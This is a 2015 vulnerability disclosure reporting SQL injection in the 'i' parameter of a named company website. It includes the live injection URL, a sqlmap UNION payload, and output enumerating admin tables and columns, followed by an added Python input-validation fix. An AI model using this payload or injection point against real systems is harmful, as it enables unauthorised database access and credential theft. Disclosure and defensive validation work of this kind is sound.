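2015-01-29: Details sent to the vendor; waiting for the vendor to handle them
2015-02-03: The vendor has actively ignored the vulnerability; details disclosed to the public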
抚顺经纬网络 (Fushun Jingwei Network) # one injection = =
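Vulnerable URL: /com.asp?t=0&s=0&i=1
The parameter i is injectable.
Tested against the official site.
Injection point: http://fsit.net/com.asp?t=0&s=0&i=1
The process is pasted below.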
Place: GET
Parameter: i
    Type: UNION query
    Title: Generic UNION query (47) - 1 column
    Payload: t=0&s=0&i=-8586 UNION ALL SELECT CHR(58)&CHR(105)&CHR(102)&CHR(105)&CHR(58)&CHR(119)&CHR(102)&CHR(112)&CHR(67)&CHR(78)&CHR(119)&CHR(84)&CHR(101)&CHR(80)&CHR(98)&CHR(58)&CHR(97)&CHR(120)&CHR(121)&CHR(58) FROM MSysAccessObjects%00
---
[23:00:27] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[23:00:27] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[23:00:28] [WARNING] the SQL query provided does not return any output
[23:00:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[23:00:28] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[23:00:44] [INFO] checking table existence using items from 'D:\python\sqlmap\txt\common-tables.txt'
[23:00:44] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[23:00:50] [INFO] starting 8 threads
[23:00:55] [INFO] retrieved: admin
[23:03:40] [INFO] retrieved: content
[23:03:48] [INFO] retrieved: main
[23:04:28] [INFO] retrieved: root
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| admin   |
| content |
| main    |
| root    |
+---------+

Place: GET
Parameter: i
    Type: UNION query
    Title: Generic UNION query (47) - 1 column
    Payload: t=0&s=0&i=-8586 UNION ALL SELECT CHR(58)&CHR(105)&CHR(102)&CHR(105)&CHR(58)&CHR(119)&CHR(102)&CHR(112)&CHR(67)&CHR(78)&CHR(119)&CHR(84)&CHR(101)&CHR(80)&CHR(98)&CHR(58)&CHR(97)&CHR(120)&CHR(121)&CHR(58) FROM MSysAccessObjects%00
---
[23:09:13] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[23:09:13] [ERROR] cannot retrieve column names, back-end DBMS is Access
do you want to use common column existence check? [Y/n/q] y
[23:09:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[23:09:17] [INFO] checking column existence using items from 'D:\python\sqlmap\txt\common-columns.txt'
[23:09:17] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[23:09:20] [INFO] starting 8 threads
[23:09:20] [INFO] retrieved: username
[23:09:21] [INFO] retrieved: id
[23:09:26] [INFO] retrieved: data
Database: Microsoft_Access_masterdb
Table: admin
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| data     | non-numeric |
| id       | numeric     |
| username | non-numeric |
+----------+-------------+
Filter.
Severity: no impact (ignored by vendor)
Ignored at: 2015-02-03 10:24
None yet.
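
The "filter" fix named in the report, as an added example (not part of the original report and not the site's code, which the page does not show): a strict allow-list check for the three query parameters that rejects the UNION payload seen in the sqlmap output. It is written in Python rather than ASP; the function names, the assumption that t, s and i are plain integer ids, and the sample requests are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: t, s and i are plain non-negative integer ids, as in the
# report's sample URL /com.asp?t=0&s=0&i=1 (the site's code is not shown).
NUMERIC_PARAMS = ("t", "s", "i")
# ASCII digits only, bounded length. int() alone is too lax: it also accepts
# signs, surrounding whitespace, underscores and non-ASCII digits.
INT_RE = re.compile(r"[0-9]{1,9}")

def validate_query(url):
    """Return (clean, errors). clean maps accepted parameters to ints;
    errors names every parameter that must cause the request to be refused."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    clean, errors = {}, []
    for name in NUMERIC_PARAMS:
        values = [v for k, v in pairs if k == name]
        if len(values) == 1 and INT_RE.fullmatch(values[0]):
            clean[name] = int(values[0])
        else:  # missing, duplicated, or anything other than 1-9 ASCII digits
            errors.append(name)
    return clean, errors

def rejected(urls):
    """Return the URLs a handler using validate_query() would refuse."""
    return [u for u in urls if validate_query(u)[1]]

# Constructed sample requests (not captured traffic). The second is a
# shortened, URL-encoded form of the UNION payload in the sqlmap output.
SAMPLE_REQUESTS = [
    "/com.asp?t=0&s=0&i=1",
    "/com.asp?t=0&s=0&i=-8586%20UNION%20ALL%20SELECT%20CHR(58)"
    "%20FROM%20MSysAccessObjects%00",
    "/com.asp?t=0&s=0&i=1&i=2",      # duplicated parameter
    "/com.asp?t=0&s=0&i=%D9%A1",     # non-ASCII digit (U+0661)
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        clean, errors = validate_query(url)
        print("REJECT" if errors else "ACCEPT", errors or clean, url[:60])
```

The validated integer should then be bound as a query parameter instead of being concatenated into the SQL string, so that the check is not the only barrier.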